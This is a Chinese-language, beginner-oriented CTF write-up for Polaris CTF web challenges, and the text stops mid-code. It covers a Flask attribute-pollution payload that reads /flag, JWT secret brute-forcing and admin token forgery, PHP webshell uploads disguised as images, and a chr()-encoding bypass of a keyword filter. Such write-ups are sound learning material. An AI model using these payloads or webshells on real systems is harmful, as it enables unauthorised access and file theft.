Polaris CTF的web题wp,如何深入分析和破解?
摘要:0基础也能看懂的,polarisctf部分web题wp ez_python 题目 from flask import Flask, request import json app = Flask(__name__) def merge(sr
0基础也能看懂的,polarisctf部分web题wp
ez_python
题目
from flask import Flask, request
import json
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class Config:
def __init__(self):
self.filename = "app.py"
class Polaris:
def __init__(self):
self.config = Config()
instance = Polaris()
@app.route('/', methods=['GET', 'POST'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "Welcome to Polaris CTF"
@app.route('/read')
def read():
return open(instance.config.filename).read()
@app.route('/src')
def src():
return open(__file__).read()
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)
解
@app.route('/read')
def read():
return open(instance.config.filename).read()
目标是污染instance.config.filename为flag
{"config": {"filename": "/flag"}}
only real
题目
解
源代码泄露账号密码
<!-- xmuser/123456 -->
登录时抓包发现有token并且登录后无法操作,猜测伪造token
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIiwicm9sZSI6InVzZXIiLCJleHAiOjE3NzQ5NDU5MjJ9.oklvvL_iH2xPICwCpsImEtoYgHdXe8y6GXNsbnsB-T4
爆破出key=cdef
改token的role=xmuser,发现还是无法操作
修改role=admin,发现可以操作了(其实直接改前端代码把disabled删掉也可以)
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3NzQ5NDU5MjIsInJvbGUiOiJhZG1pbiIsInN1YiI6IjEifQ.w6j2pDZ0eThtl-bUz0HBzRSxcKRT06J-kYAx6Ysu6Pw
随便传个1.php果然有限制,试试1.jpg图片马
#define width 1337
#define height 1337
<?php eval($_POST['cmd']); ?>
<script language="php">eval($_POST[1]);</script>
均提示文件内容包含非法关键字
法一:chr绕过
尝试绕过关键字限制
<?=
$func=chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
$cmd='';
$cmd_chars=[99, 97, 116, 32, 47, 102, 108, 97, 103];
foreach($cmd_chars as $ascii){